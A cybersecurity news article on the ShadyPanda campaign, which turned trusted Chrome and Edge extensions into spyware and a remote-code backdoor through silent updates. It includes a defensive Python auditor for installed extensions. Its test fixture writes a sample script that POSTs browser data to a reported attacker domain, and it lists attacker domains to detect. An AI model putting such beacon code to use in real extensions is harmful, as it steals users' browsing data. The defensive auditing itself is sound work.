Red Hot Cyber
Cybersecurity is about sharing. Recognize the risk, combat it, share your experiences, and encourage others to do better than you.
ShadyPanda Malware Infects 4.3M Browsers with Chrome Edge Extensions

2 December 2025 08:09

Researchers at Koi Security have described a multi-stage operation called ShadyPanda. Over the course of seven years, the attackers released seemingly useful extensions for Chrome and Edge and built up an audience with positive comments and reviews; they then released an update containing malicious code. Researchers estimate that the total number of installations reached a remarkable 4.3 million.

The scheme is simple and unpleasant: “legitimate” extensions accumulate ratings, reviews, and trust badges for years, only to receive an update that contains malware, retrieves arbitrary JavaScript, and executes it with full access to the browser.

The code is obfuscated and becomes silent when developer tools are opened. Telemetry is sent to attacker-controlled domains, including api.cleanmasters[.]store.

Koi identifies two active lines of attack:

1. A backdoor targeting 300,000 computers. Five extensions (including Clean Master) received a “reverse update” in mid-2024. The attackers’ arsenal includes page content replacement (including on HTTPS pages), session hijacking, and comprehensive activity telemetry. Three of the five had existed for years as harmless extensions and were even highlighted or verified, which is why their updates were distributed immediately. These five have already been removed from the stores, but the infrastructure on infected browsers remains.

2. A spyware kit for over 4 million Edge installations. Publisher Starlab Technology released five more add-ons in 2023. Two of these are actual spyware. The flagship is WeTab, with approximately 3 million installations: it collects all visited URLs, search queries, clicks, browser fingerprints, and browsing behavior and sends them in real time to 17 domains (eight are Baidu in China, seven are WeTab and Google Analytics).

At the time of publication , Koi notes that WeTab is still available in the Edge catalog.

This gives the attackers leverage: they can trigger the same RCE backdoor at any time. Koi also linked ShadyPanda to earlier waves: in 2023, “wallpapers and productivity” (145 extensions across two stores), whose traffic was monetized by spoofing affiliate tags and harvesting search queries; later, search interception via trovi[.]com and cookie exfiltration. In every case the gamble was the same: once initial moderation is passed, marketplaces rarely monitor extension behavior afterwards, and that is precisely what the entire “silent updates” strategy exploits.
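The traits described above (full-browser host access combined with APIs that allow page rewriting or session theft, plus code that talks to the reported domains) are things a defender can check for locally. The following is an added example, not code from Koi Security or Red Hot Cyber: it audits an unpacked extension directory (the Extensions/<id>/<version>/ layout shared by Chrome and Edge) and builds a constructed sample extension to run against; the sample name, id and script are invented for illustration.

```python
"""Audit unpacked browser extensions for the traits ShadyPanda abused.

Added example (not Koi Security's or the article's code). Reads each
extension's manifest.json, flags broad host access combined with
page-rewriting or session-stealing APIs, and scans its scripts for the
domains named in the report.
"""
import json
import tempfile
from pathlib import Path

# Domains taken from the article (de-fanged brackets removed).
REPORTED_DOMAINS = ("cleanmasters.store", "trovi.com")
BROAD_HOSTS = {"<all_urls>", "*://*/*", "http://*/*", "https://*/*"}
# APIs that make page content replacement and session hijacking possible.
SENSITIVE_APIS = {"webRequest", "webRequestBlocking", "declarativeNetRequest",
                  "cookies", "scripting", "tabs"}


def audit_extension(ext_dir: Path) -> dict:
    """Return risk flags for one unpacked extension version directory."""
    manifest = json.loads((ext_dir / "manifest.json").read_text("utf-8"))
    # MV2 lists hosts under "permissions"; MV3 under "host_permissions".
    perms = set(manifest.get("permissions", [])) | set(manifest.get("host_permissions", []))
    hits = set()
    for js in ext_dir.rglob("*.js"):
        text = js.read_text("utf-8", errors="ignore")
        hits.update(d for d in REPORTED_DOMAINS if d in text)
    flags = {
        "name": manifest.get("name"), "version": manifest.get("version"),
        "broad_host_access": bool(perms & BROAD_HOSTS),
        "sensitive_apis": sorted(perms & SENSITIVE_APIS),
        "reported_domains": sorted(hits),
    }
    flags["suspicious"] = bool(flags["reported_domains"]) or (
        flags["broad_host_access"] and bool(flags["sensitive_apis"]))
    return flags


def build_sample() -> Path:
    """Write a constructed (not real) extension that mimics the reported traits."""
    root = Path(tempfile.mkdtemp()) / "Extensions" / "sampleid" / "3.1.0_0"
    root.mkdir(parents=True)
    (root / "manifest.json").write_text(json.dumps({
        "name": "Sample Cleaner", "version": "3.1.0", "manifest_version": 3,
        "permissions": ["webRequest", "cookies", "storage"],
        "host_permissions": ["<all_urls>"]}))
    (root / "background.js").write_text(  # constructed telemetry beacon
        'fetch("https://api.cleanmasters.store/t", {method: "POST", body: navigator.userAgent});')
    return root


if __name__ == "__main__":
    print(json.dumps(audit_extension(build_sample()), indent=2))
```

Point audit_extension at each version directory under a real profile's Extensions folder to review what is actually installed; an extension that is flagged only for broad access plus sensitive APIs may be legitimate, so treat that as a review queue rather than a verdict.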

Five extensions with an RCE backdoor have already been removed from the Chrome Web Store; WeTab, however, remains in the Edge add-ons store. Google generally stresses that updates go through a review process, as its documentation states, but the ShadyPanda case shows that moderation at submission time alone is not enough.


The editorial staff of Red Hot Cyber is composed of IT and cybersecurity professionals, supported by a network of qualified sources who also operate confidentially. The team works daily to analyze, verify, and publish news, insights, and reports on cybersecurity, technology, and digital threats, with a particular focus on the accuracy of information and the protection of sources. The information published is derived from direct research, field experience, and exclusive contributions from national and international operational contexts.